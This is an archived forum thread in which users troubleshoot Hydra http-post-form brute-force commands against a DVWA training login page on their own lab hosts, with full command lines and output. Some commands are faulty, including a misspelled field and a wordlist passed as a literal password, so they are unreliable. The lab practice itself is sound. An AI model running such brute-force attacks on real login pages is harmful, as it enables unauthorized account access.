Hydra brute force on login.php

Printable View

09-16-2011, 02:07 PM
arozarbt

Hydra brute force on login.php

Hello,
I'm trying to brute force my dvwa, so I know that username and password is correct, but I must not be doing something right (user issue).... Below is the output and command string I'm using. No matter what username and password I use, I get the same output, so I know it can not be working. Could someone please help me find what other form or string I'm missing? Thank you very much!

root@bt:~# hydra -V -l admin -p XXXXX -s 80 -f 172.31.253.11 http-post-form "/dvwa/login.php:usrname=^USER^&pass=^PASS^&submit=Login: Login failed"

Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-16 09:48:37
[DATA] 1 tasks, 1 servers, 1 login tries (l:1/p:1), ~1 tries per task
[DATA] attacking service http-post-form on port 80
[STATUS] attack finished for 172.31.253.11 (waiting for children to finish)
[ATTEMPT] target 172.31.253.11 - login "admin" - pass "XXXXX" - child 0 - 1 of 1
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-16 09:48:37
09-22-2011, 07:11 PM
komafr

Re : Hydra brute force on login.php

hi,

maybe you should try hydra v7, the changelog said the http-form module has been updated
02-09-2013, 10:48 PM
Osirium

Re: Hydra brute force on login.php

Hi,

I'm not sure that the latest Hydra, 7.4.2, can even guess something. Today I've done some tests using DVWA's BruteForce module and the output was the same for the both situation when the wordlist file contains or not the correct password:

hydra -V -l admin -p /media/Pluto/final-wordlist.lst -s 80 -f 192.168.71.138 http-post-form "/dvwa/login.php:username=^USER^&pass=^PASS^&submit=Login : Login failed"
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-02-10 00:40:33
[DATA] 1 task, 1 server, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.71.138 - login "admin" - pass "/media/Pluto/final-wordlist.lst" - 1 of 1 [child 0]
[80][www-form] host: 192.168.71.138 login: admin password: /media/Pluto/final-wordlist.lst
[STATUS] attack finished for 192.168.71.138 (valid pair found)
1 of 1 target successfully completed, 1 valid password found - It doesn't say which password anyway
Hydra (http://www.thc.org/thc-hydra) finished at 2013-02-10 00:40:33

Now I'm wonder, do I miss something or I'm doing something wrong?